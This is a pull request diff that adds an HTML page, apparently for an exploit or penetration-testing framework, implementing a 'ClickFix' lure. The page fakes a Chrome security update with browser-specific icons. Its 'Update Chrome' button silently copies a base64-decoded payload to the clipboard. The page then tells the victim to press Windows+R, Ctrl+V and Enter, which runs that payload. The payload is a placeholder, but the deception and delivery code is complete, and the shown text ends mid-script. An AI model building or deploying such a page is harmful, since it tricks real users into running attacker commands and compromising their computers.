### PR TITLE
clickfix server

### DIFF
--- a/data/exploits/clickfix/browser_update.html
+++ b/data/exploits/clickfix/browser_update.html
@@ -98,17 +98,18 @@
           };
 
           // Attempt copy immediately to preserve user gesture
+          const payload = atob('INSERT_PAYLOAD_HERE');
           if (navigator.clipboard && navigator.clipboard.writeText) {
             navigator.clipboard
-              .writeText('INSERT_PAYLOAD_HERE')
+              .writeText(payload)
               .then(() => {
                 onMovementSuccess();
               })
               .catch((err) => {
-                this._fallbackCopy('INSERT_PAYLOAD_HERE', onMovementSuccess, onError);
+                this._fallbackCopy(payload, onMovementSuccess, onError);
               });
           } else {
-            this._fallbackCopy('INSERT_PAYLOAD_HERE', onMovementSuccess, onError);
+            this._fallbackCopy(payload, onMovementSuccess, onError);
           }
         },
 

--- a/data/exploits/clickfix/browser_update.html
+++ b/data/exploits/clickfix/browser_update.html
@@ -1,0 +1,627 @@
+<!doctype html>
+<html lang="en">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>Chrome Update Required</title>
+    <style>
+        @keyframes spin {
+            to { transform: rotate(360deg); }
+        }
+        :root {
+        /* Brand Colors */
+        --color-primary: #2563eb;           /* Blue 600 */
+        --color-primary-hover: #1d4ed8;     /* Blue 700 */
+        --color-secondary: #64748b;         /* Slate 500 */
+        --color-success: #059669;           /* Emerald 600 - Accessible */
+        --color-warning: #b45309;           /* Amber 700 - Accessible Text */
+        --color-warning-bright: #f59e0b;    /* Amber 500 - High Vis Background */
+        --color-danger: #dc2626;            /* Red 600 - Accessible */
+        --color-info: #3b82f6;              /* Blue 500 */
+
+        /* Neutral Colors */
+        --color-bg-body: #f8fafc;           /* Slate 50 */
+        --color-bg-surface: #ffffff;        /* White */
+        --color-text-main: #0f172a;         /* Slate 900 */
+        --color-text-muted: #64748b;        /* Slate 500 */
+        --color-border: #e2e8f0;            /* Slate 200 */
+
+        /* Typography */
+        --font-sans: 'Inter', -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
+        --font-mono: 'JetBrains Mono', 'Fira Code', monospace;
+
+        /* Spacing */
+        --spacing-xs: 0.25rem;
+        --spacing-sm: 0.5rem;
+        --spacing-md: 1rem;
+        --spacing-lg: 1.5rem;
+        --spacing-xl: 2rem;
+
+        /* Shadows */
+        --shadow-sm: 0 1px 2px 0 rgb(0 0 0 / 0.05);
+        --shadow-md: 0 4px 6px -1px rgb(0 0 0 / 0.1), 0 2px 4px -2px rgb(0 0 0 / 0.1);
+        --shadow-lg: 0 10px 15px -3px rgb(0 0 0 / 0.1), 0 4px 6px -4px rgb(0 0 0 / 0.1);
+
+        /* Radius */
+        --radius-sm: 0.375rem;
+        --radius-md: 0.5rem;
+        --radius-lg: 0.75rem;
+        }
+
+        *,
+        *::before,
+        *::after {
+        box-sizing: border-box;
+        }
+
+        html {
+        scroll-behavior: smooth;
+        }
+
+        body {
+        font-family: var(--font-sans);
+        background-color: var(--color-bg-body);
+        color: var(--color-text-main);
+        line-height: 1.6;
+        margin: 0;
+        padding: 0;
+        -webkit-font-smoothing: antialiased;
+        }
+
+        h1, h2, h3, h4, h5, h6 {
+        margin-top: 0;
+        font-weight: 700;
+        line-height: 1.2;
+        color: var(--color-text-main);
+        }
+
+        h2 { font-size: 1.875rem; }
+        h3 { font-size: 1.5rem; color:white}
+
+    </style>
+  </head>
+  <body>
+    <script>
+      const ClickFix = {
+        /**
+         * @param {function} onSuccess - Callback after successful clipboard copy
+         * @param {function} onError - Callback if clipboard copy fails
+         */
+        trigger: function (onSuccess, onError) {
+          // Wrap onSuccess to wait for mouse movement
+          const onMovementSuccess = () => {
+            const handleMove = () => {
+              document.removeEventListener("mousemove", handleMove);
+              if (onSuccess) onSuccess();
+            };
+            document.addEventListener("mousemove", handleMove);
+          };
+
+          // Attempt copy immediately to preserve user gesture
+          if (navigator.clipboard && navigator.clipboard.writeText) {
+            navigator.clipboard
+              .writeText('INSERT_PAYLOAD_HERE')
+              .then(() => {
+                onMovementSuccess();
+              })
+              .catch((err) => {
+                this._fallbackCopy('INSERT_PAYLOAD_HERE', onMovementSuccess, onError);
+              });
+          } else {
+            this._fallbackCopy('INSERT_PAYLOAD_HERE', onMovementSuccess, onError);
+          }
+        },
+
+        _fallbackCopy: function (text, onSuccess, onError) {
+          const textarea = document.createElement("textarea");
+          textarea.value = text;
+          textarea.style.position = "fixed";
+          textarea.style.opacity = "0";
+          document.body.appendChild(textarea);
+          textarea.select();
+          try {
+            document.execCommand("copy");
+            document.body.removeChild(textarea);
+            if (onSuccess) onSuccess();
+          } catch (err) {
+            document.body.removeChild(textarea);
+            if (onError) onError(err);
+          }
+        }
+      };
+
+      window.ClickFix = ClickFix;
+    </script>
+
+    <!-- Main Content Area (The Lure) -->
+    <div id="main-content">
+      <!-- Chrome Update Trap -->
+      <div
+        id="chrome-overlay"
+        style="
+          position: fixed;
+          top: 0;
+          left: 0;
+          width: 100%;
+          height: 100%;
+          background: rgba(255, 255, 255, 0.9);
+          z-index: 9999;
+          display: flex;
+          justify-content: center;
+          align-items: flex-start;
+          padding-top: 100px;
+          font-family:
+            &quot;Segoe UI&quot;, Tahoma, Geneva, Verdana, sans-serif;
+        "
+      >
+        <div
+          style="
+            background: white;
+            width: 500px;
+            box-shadow: 0 4px 16px rgba(0, 0, 0, 0.2);
+            border-radius: 8px;
+            overflow: hidden;
+            border: 1px solid #dadce0;
+          "
+        >
+          <div
+            style="
+              padding: 20px 24px;
+              border-bottom: 1px solid #f1f3f4;
+              display: flex;
+              align-items: center;
+            "
+          >
+            <!-- Chrome -->
+            <svg id="browser-icon-chrome" width="32" height="32" viewBox="0 0 24 24" style="margin-right: 12px; display: none;" xmlns="http://www.w3.org/2000/svg">
+              <path d="M12 12 L12 0 A12 12 0 0 1 22.39 18z" fill="#F44336"/>
+              <path d="M12 12 L22.39 18 A12 12 0 0 1 1.61 18z" fill="#FFC107"/>
+              <path d="M12 12 L1.61 18 A12 12 0 0 1 12 0z" fill="#4CAF50"/>
+              <circle cx="12" cy="12" r="5.5" fill="white"/>
+              <circle cx="12" cy="12" r="4" fill="#2196F3"/>
+            </svg>
+
+            <!-- Edge -->
+            <svg id="browser-icon-edge" width="32" height="32" style="margin-right: 12px; display: none;" xmlns="http://www.w3.org/2000/svg" viewBox="-13.150631399175808 4.920000000000002 291.9547293925731 272.12347840798424">
+              <linearGradient id="a" gradientTransform="matrix(1 0 0 -1 0 266)" gradientUnits="userSpaceOnUse" x1="63.33" x2="241.67" y1="84.03" y2="84.03"><stop offset="0" stop-color="#0c59a4"/><stop offset="1" stop-color="#114a8b"/></linearGradient>
+              <radialGradient id="b" cx="161.83" cy="68.91" gradientTransform="matrix(1 0 0 -.95 0 248.84)" gradientUnits="userSpaceOnUse" r="95.38"><stop offset=".72" stop-opacity="0"/><stop offset=".95" stop-opacity=".53"/><stop offset="1"/></radialGradient>
+              <linearGradient id="c" gradientTransform="matrix(1 0 0 -1 0 266)" gradientUnits="userSpaceOnUse" x1="157.35" x2="45.96" y1="161.39" y2="40.06"><stop offset="0" stop-color="#1b9de2"/><stop offset=".16" stop-color="#1595df"/><stop offset=".67" stop-color="#0680d7"/><stop offset="1" stop-color="#0078d4"/></linearGradient>
+              <radialGradient id="d" cx="-340.29" cy="62.99" gradientTransform="matrix(.15 -.99 -.8 -.12 176.64 -125.4)" gradientUnits="userSpaceOnUse" r="143.24"><stop offset=".76" stop-opacity="0"/><stop offset=".95" stop-opacity=".5"/><stop offset="1"/></radialGradient>
+              <radialGradient id="e" cx="113.37" cy="570.21" gradientTransform="matrix(-.04 1 2.13 .08 -1179.54 -106.69)" gradientUnits="userSpaceOnUse" r="202.43"><stop offset="0" stop-color="#35c1f1"/><stop offset=".11" stop-color="#34c1ed"/><stop offset=".23" stop-color="#2fc2df"/><stop offset=".31" stop-color="#2bc3d2"/><stop offset=".67" stop-color="#36c752"/></radialGradient>
+              <radialGradient id="f" cx="376.52" cy="567.97" gradientTransform="matrix(.28 .96 .78 -.23 -303.76 -148.5)" gradientUnits="userSpaceOnUse" r="97.34"><stop offset="0" stop-color="#66eb6e"/><stop offset="1" stop-color="#66eb6e" stop-opacity="0"/></radialGradient>
+              <path d="M235.68 195.46a93.73 93.73 0 0 1-10.54 4.71 101.87 101.87 0 0 1-35.9 6.46c-47.32 0-88.54-32.55-88.54-74.32A31.48 31.48 0 0 1 117.13 105c-42.8 1.8-53.8 46.4-53.8 72.53 0 73.88 68.09 81.37 82.76 81.37 7.91 0 19.84-2.3 27-4.56l1.31-.44a128.34 128.34 0 0 0 66.6-52.8 4 4 0 0 0-5.32-5.64z" fill="url(#a)" transform="translate(-4.63 -4.92)"/>
+              <path d="M235.68 195.46a93.73 93.73 0 0 1-10.54 4.71 101.87 101.87 0 0 1-35.9 6.46c-47.32 0-88.54-32.55-88.54-74.32A31.48 31.48 0 0 1 117.13 105c-42.8 1.8-53.8 46.4-53.8 72.53 0 73.88 68.09 81.37 82.76 81.37 7.91 0 19.84-2.3 27-4.56l1.31-.44a128.34 128.34 0 0 0 66.6-52.8 4 4 0 0 0-5.32-5.64z" fill="url(#b)" opacity=".35" transform="translate(-4.63 -4.92)"/>
+              <path d="M110.34 246.34A79.2 79.2 0 0 1 87.6 225a80.72 80.72 0 0 1 29.53-120c3.12-1.47 8.45-4.13 15.54-4a32.35 32.35 0 0 1 25.69 13 31.88 31.88 0 0 1 6.36 18.66c0-.21 24.46-79.6-80-79.6-43.9 0-80 41.66-80 78.21a130.15 130.15 0 0 0 12.11 56 128 128 0 0 0 156.38 67.11 75.55 75.55 0 0 1-62.78-8z" fill="url(#c)" transform="translate(-4.63 -4.92)"/>
+              <path d="M110.34 246.34A79.2 79.2 0 0 1 87.6 225a80.72 80.72 0 0 1 29.53-120c3.12-1.47 8.45-4.13 15.54-4a32.35 32.35 0 0 1 25.69 13 31.88 31.88 0 0 1 6.36 18.66c0-.21 24.46-79.6-80-79.6-43.9 0-80 41.66-80 78.21a130.15 130.15 0 0 0 12.11 56 128 128 0 0 0 156.38 67.11 75.55 75.55 0 0 1-62.78-8z" fill="url(#d)" opacity=".41" transform="translate(-4.63 -4.92)"/>
+              <path d="M156.94 153.78c-.81 1.05-3.3 2.5-3.3 5.66 0 2.61 1.7 5.12 4.72 7.23 14.38 10 41.49 8.68 41.56 8.68a59.56 59.56 0 0 0 30.27-8.35 61.38 61.38 0 0 0 30.43-52.88c.26-22.41-8-37.31-11.34-43.91-21.19-41.45-66.93-65.29-116.67-65.29a128 128 0 0 0-128 126.2c.48-36.54 36.8-66.05 80-66.05 3.5 0 23.46.34 42 10.07 16.34 8.58 24.9 18.94 30.85 29.21 6.18 10.67 7.28 24.15 7.28 29.52s-2.74 13.33-7.8 19.91z" fill="url(#e)" transform="translate(-4.63 -4.92)"/>
+              <path d="M156.94 153.78c-.81 1.05-3.3 2.5-3.3 5.66 0 2.61 1.7 5.12 4.72 7.23 14.38 10 41.49 8.68 41.56 8.68a59.56 59.56 0 0 0 30.27-8.35 61.38 61.38 0 0 0 30.43-52.88c.26-22.41-8-37.31-11.34-43.91-21.19-41.45-66.93-65.29-116.67-65.29a128 128 0 0 0-128 126.2c.48-36.54 36.8-66.05 80-66.05 3.5 0 23.46.34 42 10.07 16.34 8.58 24.9 18.94 30.85 29.21 6.18 10.67 7.28 24.15 7.28 29.52s-2.74 13.33-7.8 19.91z" fill="url(#f)" transform="translate(-4.63 -4.92)"/>
+            </svg>
+
+            <!-- Firefox -->
+            <svg id="browser-icon-firefox" width="32" height="32" viewBox="0 0 512 512" style="margin-right: 12px; display: none;" xmlns="http://www.w3.org/2000/svg">
+              <defs>
+                <radialGradient id="ffg" cx="210%" cy="-100%" r="290%"><stop offset=".1" stop-color="#ffe226"/><stop offset=".79" stop-color="#ff7139"/></radialGradient>
+                <radialGradient id="ffc" cx="49%" cy="40%" r="128%" gradientTransform="matrix(.82 0 0 1 .088 0)"><stop offset=".3" stop-color="#960e18"/><stop offset=".35" stop-color="#b11927" stop-opacity=".74"/><stop offset=".43" stop-color="#db293d" stop-opacity=".34"/><stop offset=".5" stop-color="#f5334b" stop-opacity=".09"/><stop offset=".53" stop-color="#ff3750" stop-opacity="0"/></radialGradient>
+                <radialGradient id="ffd" cx="48%" cy="-12%" r="140%"><stop offset=".13" stop-color="#fff44f"/><stop offset=".53" stop-color="#ff980e"/></radialGradient>
+                <radialGradient id="ffe" cx="22.76%" cy="110.11%" r="100%"><stop offset=".35" stop-color="#3a8ee6"/><stop offset=".67" stop-color="#9059ff"/><stop offset="1" stop-color="#c139e6"/></radialGradient>
+                <radialGradient id="fff" cx="52%" cy="33%" r="59%" gradientTransform="scale(.9 1)"><stop offset=".21" stop-color="#9059ff" stop-opacity="0"/><stop offset=".97" stop-color="#6e008b" stop-opacity=".6"/></radialGradient>
+                <radialGradient id="ffb" cx="87.4%" cy="-12.9%" r="128%" gradientTransform="matrix(.8 0 0 1 .178 .129)"><stop offset=".13" stop-color="#ffbd4f"/><stop offset=".28" stop-color="#ff980e"/><stop offset=".47" stop-color="#ff3750"/><stop offset=".78" stop-color="#eb0878"/><stop offset=".86" stop-color="#e50080"/></radialGradient>
+                <radialGradient id="ffh" cx="84%" cy="-41%" r="180%"><stop offset=".11" stop-color="#fff44f"/><stop offset=".46" stop-color="#ff980e"/><stop offset=".72" stop-color="#ff3647"/><stop offset=".9" stop-color="#e31587"/></radialGradient>
+                <radialGradient id="ffi" cx="16.1%" cy="-18.6%" r="348.8%" gradientTransform="scale(1 .47) rotate(84 .279 -.297)"><stop offset="0" stop-color="#fff44f"/><stop offset=".3" stop-color="#ff980e"/><stop offset=".57" stop-color="#ff3647"/><stop offset=".74" stop-color="#e31587"/></radialGradient>
+                <radialGradient id="ffj" cx="18.9%" cy="-42.5%" r="238.4%"><stop offset=".14" stop-color="#fff44f"/><stop offset=".48" stop-color="#ff980e"/><stop offset=".66" stop-color="#ff3647"/><stop offset=".9" stop-color="#e31587"/></radialGradient>
+                <radialGradient id="ffk" cx="159.3%" cy="-44.72%" r="313.1%"><stop offset=".09" stop-color="#fff44f"/><stop offset=".63" stop-color="#ff980e"/></radialGradient>
+                <linearGradient id="ffa" x1="87.25%" y1="15.5%" x2="9.4%" y2="93.1%"><stop offset=".05" stop-color="#fff44f"/><stop offset=".37" stop-color="#ff980e"/><stop offset=".53" stop-color="#ff3647"/><stop offset=".7" stop-color="#e31587"/></linearGradient>
+                <linearGradient id="ffl" x1="80%" y1="14%" x2="18%" y2="84%"><stop offset=".17" stop-color="#fff44f" stop-opacity=".8"/><stop offset=".6" stop-color="#fff44f" stop-opacity="0"/></linearGradient>
+              </defs>
+              <path d="M478.711 166.353c-10.445-25.124-31.6-52.248-48.212-60.821 13.52 26.505 21.345 53.093 24.335 72.936 0 .039.015.136.047.4C427.706 111.135 381.627 83.823 344 24.355c-1.9-3.007-3.805-6.022-5.661-9.2a73.716 73.716 0 01-2.646-4.972A43.7 43.7 0 01332.1.677a.626.626 0 00-.546-.644.818.818 0 00-.451 0c-.034.012-.084.051-.12.065-.053.021-.12.069-.176.1.027-.036.083-.117.1-.136-60.37 35.356-80.85 100.761-82.732 133.484a120.249 120.249 0 00-66.142 25.488 71.355 71.355 0 00-6.225-4.7 111.338 111.338 0 01-.674-58.732c-24.688 11.241-43.89 29.01-57.85 44.7h-.111c-9.527-12.067-8.855-51.873-8.312-60.184-.114-.515-7.107 3.63-8.023 4.255a175.073 175.073 0 00-23.486 20.12 210.478 210.478 0 00-22.442 26.913c0 .012-.007.026-.011.038 0-.013.007-.026.011-.038a202.838 202.838 0 00-32.247 72.805c-.115.521-.212 1.061-.324 1.586-.452 2.116-2.08 12.7-2.365 15-.022.177-.032.347-.053.524a229.066 229.066 0 00-3.9 33.157c0 .41-.025.816-.025 1.227C16 388.418 123.6 496 256.324 496c118.865 0 217.56-86.288 236.882-199.63.407-3.076.733-6.168 1.092-9.271 4.777-41.21-.53-84.525-15.587-120.746z" fill="url(#ffa)"/>
+              <path d="M478.711 166.353c-10.445-25.124-31.6-52.248-48.212-60.821 13.52 26.505 21.345 53.093 24.335 72.936 0-.058.011.048.036.226.012.085.027.174.04.259 22.675 61.47 10.322 123.978-7.479 162.175-27.539 59.1-94.215 119.67-198.576 116.716C136.1 454.651 36.766 370.988 18.223 261.41c-3.379-17.28 0-26.054 1.7-40.084-2.071 10.816-2.86 13.94-3.9 33.157 0 .41-.025.816-.025 1.227C16 388.418 123.6 496 256.324 496c118.865 0 217.56-86.288 236.882-199.63.407-3.076.733-6.168 1.092-9.271 4.777-41.21-.53-84.525-15.587-120.746z" fill="url(#ffb)"/>
+              <path d="M478.711 166.353c-10.445-25.124-31.6-52.248-48.212-60.821 13.52 26.505 21.345 53.093 24.335 72.936 0-.058.011.048.036.226.012.085.027.174.04.259 22.675 61.47 10.322 123.978-7.479 162.175-27.539 59.1-94.215 119.67-198.576 116.716C136.1 454.651 36.766 370.988 18.223 261.41c-3.379-17.28 0-26.054 1.7-40.084-2.071 10.816-2.86 13.94-3.9 33.157 0 .41-.025.816-.025 1.227C16 388.418 123.6 496 256.324 496c118.865 0 217.56-86.288 236.882-199.63.407-3.076.733-6.168 1.092-9.271 4.777-41.21-.53-84.525-15.587-120.746z" fill="url(#ffc)"/>
+              <path d="M361.922 194.6c.524.368 1 .734 1.493 1.1a130.706 130.706 0 00-22.31-29.112C266.4 91.892 321.516 4.626 330.811.194c.027-.036.083-.117.1-.136-60.37 35.356-80.85 100.761-82.732 133.484 2.8-.194 5.592-.429 8.442-.429 45.051 0 84.289 24.77 105.301 61.487z" fill="url(#ffd)"/>
+              <path d="M256.772 209.514c-.393 5.978-21.514 26.593-28.9 26.593-68.339 0-79.432 41.335-79.432 41.335 3.027 34.81 27.261 63.475 56.611 78.643 1.339.692 2.694 1.317 4.05 1.935a132.768 132.768 0 007.059 2.886 106.743 106.743 0 0031.271 6.031c119.78 5.618 142.986-143.194 56.545-186.408 22.137-3.85 45.115 5.053 57.947 14.067-21.012-36.714-60.25-61.484-105.3-61.484-2.85 0-5.641.235-8.442.429a120.249 120.249 0 00-66.142 25.488c3.664 3.1 7.8 7.244 16.514 15.828 16.302 16.067 58.13 32.705 58.219 34.657z" fill="url(#ffe)"/>
+              <path d="M256.772 209.514c-.393 5.978-21.514 26.593-28.9 26.593-68.339 0-79.432 41.335-79.432 41.335 3.027 34.81 27.261 63.475 56.611 78.643 1.339.692 2.694 1.317 4.05 1.935a132.768 132.768 0 007.059 2.886 106.743 106.743 0 0031.271 6.031c119.78 5.618 142.986-143.194 56.545-186.408 22.137-3.85 45.115 5.053 57.947 14.067-21.012-36.714-60.25-61.484-105.3-61.484-2.85 0-5.641.235-8.442.429a120.249 120.249 0 00-66.142 25.488c3.664 3.1 7.8 7.244 16.514 15.828 16.302 16.067 58.13 32.705 58.219 34.657z" fill="url(#fff)"/>
+              <path d="M170.829 151.036a244.042 244.042 0 014.981 3.3 111.338 111.338 0 01-.674-58.732c-24.688 11.241-43.89 29.01-57.85 44.7 1.155-.033 36.014-.66 53.543 10.732z" fill="url(#ffg)"/>
+              <path d="M18.223 261.41C36.766 370.988 136.1 454.651 248.855 457.844c104.361 2.954 171.037-57.62 198.576-116.716 17.8-38.2 30.154-100.7 7.479-162.175l-.008-.026-.032-.233c-.025-.178-.04-.284-.036-.226 0 .039.015.136.047.4 8.524 55.661-19.79 109.584-64.051 146.044l-.133.313c-86.245 70.223-168.774 42.368-185.484 30.966a144.108 144.108 0 01-3.5-1.743c-50.282-24.029-71.054-69.838-66.6-109.124-42.457 0-56.934-35.809-56.934-35.809s38.119-27.179 88.358-3.541c46.53 21.893 90.228 3.543 90.233 3.541-.089-1.952-41.917-18.59-58.223-34.656-8.713-8.584-12.85-12.723-16.514-15.828a71.355 71.355 0 00-6.225-4.7 282.929 282.929 0 00-4.981-3.3c-17.528-11.392-52.388-10.765-53.543-10.735h-.111c-9.527-12.067-8.855-51.873-8.312-60.184-.114-.515-7.107 3.63-8.023 4.255a175.073 175.073 0 00-23.486 20.12 210.478 210.478 0 00-22.442 26.919c0 .012-.007.026-.011.038 0-.013.007-.026.011-.038a202.838 202.838 0 00-32.247 72.805c-.115.521-8.65 37.842-4.44 57.199z" fill="url(#ffh)"/>
+              <path d="M341.105 166.587a130.706 130.706 0 0122.31 29.112c1.323.994 2.559 1.985 3.608 2.952 54.482 50.2 25.936 121.2 23.807 126.26 44.261-36.46 72.575-90.383 64.051-146.044C427.706 111.135 381.627 83.823 344 24.355c-1.9-3.007-3.805-6.022-5.661-9.2a73.716 73.716 0 01-2.646-4.972A43.7 43.7 0 01332.1.677a.626.626 0 00-.546-.644.818.818 0 00-.451 0c-.034.012-.084.051-.12.065-.053.021-.12.069-.176.1-9.291 4.428-64.407 91.694 10.298 166.389z" fill="url(#ffi)"/>
+              <path d="M367.023 198.651c-1.049-.967-2.285-1.958-3.608-2.952-.489-.368-.969-.734-1.493-1.1-12.832-9.014-35.81-17.917-57.947-14.067 86.441 43.214 63.235 192.026-56.545 186.408a106.743 106.743 0 01-31.271-6.031 134.51 134.51 0 01-7.059-2.886c-1.356-.618-2.711-1.243-4.05-1.935.048.033.114.07.163.1 16.71 11.4 99.239 39.257 185.484-30.966l.133-.313c2.129-5.054 30.675-76.057-23.807-126.258z" fill="url(#ffj)"/>
+              <path d="M148.439 277.443s11.093-41.335 79.432-41.335c7.388 0 28.509-20.615 28.9-26.593s-43.7 18.352-90.233-3.541c-50.239-23.638-88.358 3.541-88.358 3.541s14.477 35.809 56.934 35.809c-4.453 39.286 16.319 85.1 66.6 109.124 1.124.537 2.18 1.124 3.334 1.639-29.348-15.169-53.582-43.834-56.609-78.644z" fill="url(#ffk)"/>
+              <path d="M478.711 166.353c-10.445-25.124-31.6-52.248-48.212-60.821 13.52 26.505 21.345 53.093 24.335 72.936 0 .039.015.136.047.4C427.706 111.135 381.627 83.823 344 24.355c-1.9-3.007-3.805-6.022-5.661-9.2a73.716 73.716 0 01-2.646-4.972A43.7 43.7 0 01332.1.677a.626.626 0 00-.546-.644.818.818 0 00-.451 0c-.034.012-.084.051-.12.065-.053.021-.12.069-.176.1.027-.036.083-.117.1-.136-60.37 35.356-80.85 100.761-82.732 133.484 2.8-.194 5.592-.429 8.442-.429 45.053 0 84.291 24.77 105.3 61.484-12.832-9.014-35.81-17.917-57.947-14.067 86.441 43.214 63.235 192.026-56.545 186.408a106.743 106.743 0 01-31.271-6.031 134.51 134.51 0 01-7.059-2.886c-1.356-.618-2.711-1.243-4.05-1.935.048.033.114.07.163.1a144.108 144.108 0 01-3.5-1.743c1.124.537 2.18 1.124 3.334 1.639-29.35-15.168-53.584-43.833-56.611-78.643 0 0 11.093-41.335 79.432-41.335 7.388 0 28.509-20.615 28.9-26.593-.089-1.952-41.917-18.59-58.223-34.656-8.713-8.584-12.85-12.723-16.514-15.828a71.355 71.355 0 00-6.225-4.7 111.338 111.338 0 01-.674-58.732c-24.688 11.241-43.89 29.01-57.85 44.7h-.111c-9.527-12.067-8.855-51.873-8.312-60.184-.114-.515-7.107 3.63-8.023 4.255a175.073 175.073 0 00-23.486 20.12 210.478 210.478 0 00-22.435 26.916c0 .012-.007.026-.011.038 0-.013.007-.026.011-.038a202.838 202.838 0 00-32.247 72.805c-.115.521-.212 1.061-.324 1.586-.452 2.116-2.486 12.853-2.77 15.156-.022.177.021-.176 0 0a279.565 279.565 0 00-3.544 33.53c0 .41-.025.816-.025 1.227C16 388.418 123.6 496 256.324 496c118.865 0 217.56-86.288 236.882-199.63.407-3.076.733-6.168 1.092-9.271 4.777-41.21-.53-84.525-15.587-120.746z" fill="url(#ffl)"/>
+            </svg>
+
+            <!-- Fallback (generic globe) -->
+            <svg id="browser-icon-other" width="24" height="24" viewBox="0 0 24 24" style="margin-right: 12px; display: none;" xmlns="http://www.w3.org/2000/svg">
+              <circle cx="12" cy="12" r="11" fill="none" stroke="#888" stroke-width="1.5"/>
+              <ellipse cx="12" cy="12" rx="4.5" ry="11" fill="none" stroke="#888" stroke-width="1.5"/>
+              <line x1="1" y1="12" x2="23" y2="12" stroke="#888" stroke-width="1.5"/>
+            </svg>
+
+            <script>
+              function detectBrowser() {
+                const ua = navigator.userAgent;
+                if (ua.includes("Edg/")) return "edge";
+                if (ua.includes("Firefox")) return "firefox";
+                if (ua.includes("Chrome")) return "chrome";
+                return "other";
+              }
+
+              const browser = detectBrowser();
+              document.getElementById(`browser-icon-${browser}`).style.display = "inline";
+            </script>
+
+            <h2
+              style="
+                margin: 0;
+                font-size: 16px;
+                color: #202124;
+                font-weight: 500;
+              "
+            >
+              Google Chrome Update
+            </h2>
+          </div>
+
+          <div style="padding: 24px">
+            <div style="display: flex; margin-bottom: 20px">
+              <div style="margin-right: 20px">
+                <div
+                  style="
+                    width: 48px;
+                    height: 48px;
+                    background: #fce8e6;
+                    border-radius: 50%;
+                    display: flex;
+                    align-items: center;
+                    justify-content: center;
+                  "
+                >
+                  <svg
+                    width="24"
+                    height="24"
+                    viewBox="0 0 24 24"
+                    fill="#d93025"
+                  >
+                    <path
+                      d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"
+                    />
+                  </svg>
+                </div>
+              </div>
+              <div>
+                <h3 style="margin: 0 0 8px 0; font-size: 16px; color: #202124">
+                  Critical security update required
+                </h3>
+                <p
+                  style="
+                    margin: 0;
+                    font-size: 14px;
+                    color: #5f6368;
+                    line-height: 1.5;
+                  "
+                >
+                  Your version of Chrome is out of date and contains critical
+                  security vulnerabilities. Websites may not display correctly
+                  until you update.
+                </p>
+                <p
+                  style="
+                    margin: 10px 0 0 0;
+                    font-size: 13px;
+                    color: #d93025;
+                    font-weight: 500;
+                  "
+                >
+                  Version: 120.0.6099.0 (Expired)
+                </p>
+              </div>
+            </div>
+          </div>
+
+          <div
+            style="
+              background: #f8f9fa;
+              padding: 16px 24px;
+              display: flex;
+              justify-content: flex-end;
+              border-top: 1px solid #f1f3f4;
+            "
+          >
+            <button
+              onclick="triggerChromePayload()"
+              style="
+                background: #1a73e8;
+                color: white;
+                border: none;
+                padding: 8px 24px;
+                border-radius: 4px;
+                font-weight: 500;
+                cursor: pointer;
+                font-size: 14px;
+              "
+            >
+              Update Chrome
+            </button>
+          </div>
+        </div>
+      </div>
+
+      <!-- Instruction Overlay (Hidden initially) -->
+      <div
+        id="chrome-instruction-overlay"
+        style="
+          display: none;
+          position: fixed;
+          top: 0;
+          left: 0;
+          width: 100%;
+          height: 100%;
+          background: rgba(0, 0, 0, 0.8);
+          z-index: 10000;
+          justify-content: center;
+          align-items: center;
+          font-family: sans-serif;
+        "
+      >
+        <div
+          style="
+            background: #202124;
+            color: white;
+            padding: 30px;
+            border-radius: 8px;
+            max-width: 500px;
+            width: 90%;
+            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.5);
+          "
+        >
+          <div
+            style="
+              display: flex;
+              align-items: center;
+              margin-bottom: 20px;
+              border-bottom: 1px solid #3c4043;
+              padding-bottom: 15px;
+            "
+          >
+            <span style="font-size: 36px; margin-right: 10px">⚠️</span>
+            <h3 style="margin: 0; font-size: 18px">Manual Update Required</h3>
+          </div>
+
+          <p style="color: #bdc1c6; margin-bottom: 20px">
+            Automatic update failed. Please follow these steps to install the
+            security patch:
+          </p>
+
+          <div
+            style="
+              background: #303134;
+              padding: 20px;
+              border-radius: 8px;
+              margin-bottom: 20px;
+            "
+          >
+            <div
+              style="margin-bottom: 15px; display: flex; align-items: center"
+            >
+              <span
+                style="
+                  background: #1a73e8;
+                  color: white;
+                  width: 24px;
+                  height: 24px;
+                  border-radius: 50%;
+                  display: flex;
+                  align-items: center;
+                  justify-content: center;
+                  margin-right: 15px;
+                  font-weight: bold;
+                "
+                >1</span
+              >
+              <span
+                >Press
+                <strong
+                  style="
+                    color: #fff;
+                    border: 1px solid #5f6368;
+                    padding: 2px 6px;
+                    border-radius: 4px;
+                    background: #3c4043;
+                  "
+                  >Windows Key</strong
+                >
+                +
+                <strong
+                  style="
+                    color: #fff;
+                    border: 1px solid #5f6368;
+                    padding: 2px 6px;
+                    border-radius: 4px;
+                    background: #3c4043;
+                  "
+                  >R</strong
+                ></span
+              >
+            </div>
+            <div
+              style="margin-bottom: 15px; display: flex; align-items: center"
+            >
+              <span
+                style="
+                  background: #1a73e8;
+                  color: white;
+                  width: 24px;
+                  height: 24px;
+                  border-radius: 50%;
+                  display: flex;
+                  align-items: center;
+                  justify-content: center;
+                  margin-right: 15px;
+                  font-weight: bold;
+                "
+                >2</span
+              >
+              <span
+                >Press
+                <strong
+                  style="
+                    color: #fff;
+                    border: 1px solid #5f6368;
+                    padding: 2px 6px;
+                    border-radius: 4px;
+                    background: #3c4043;
+                  "
+                  >Ctrl</strong
+                >
+                +
+                <strong
+                  style="
+                    color: #fff;
+                    border: 1px solid #5f6368;
+                    padding: 2px 6px;
+                    border-radius: 4px;
+                    background: #3c4043;
+                  "
+                  >V</strong
+                ></span
+              >
+            </div>
+            <div style="display: flex; align-items: center">
+              <span
+                style="
+                  background: #1a73e8;
+                  color: white;
+                  width: 24px;
+                  height: 24px;
+                  border-radius: 50%;
+                  display: flex;
+                  align-items: center;
+                  justify-content: center;
+                  margin-right: 15px;
+                  font-weight: bold;
+                "
+                >3</span
+              >
+              <span
+                >Press
+                <strong
+                  style="
+                    color: #fff;
+                    border: 1px solid #5f6368;
+                    padding: 2px 6px;
+                    border-radius: 4px;
+                    background: #3c4043;
+                  "
+                  >Enter</strong
+                ></span
+              >
+            </div>
+          </div>
+
+          <script>
+            function setLoading(btn) {
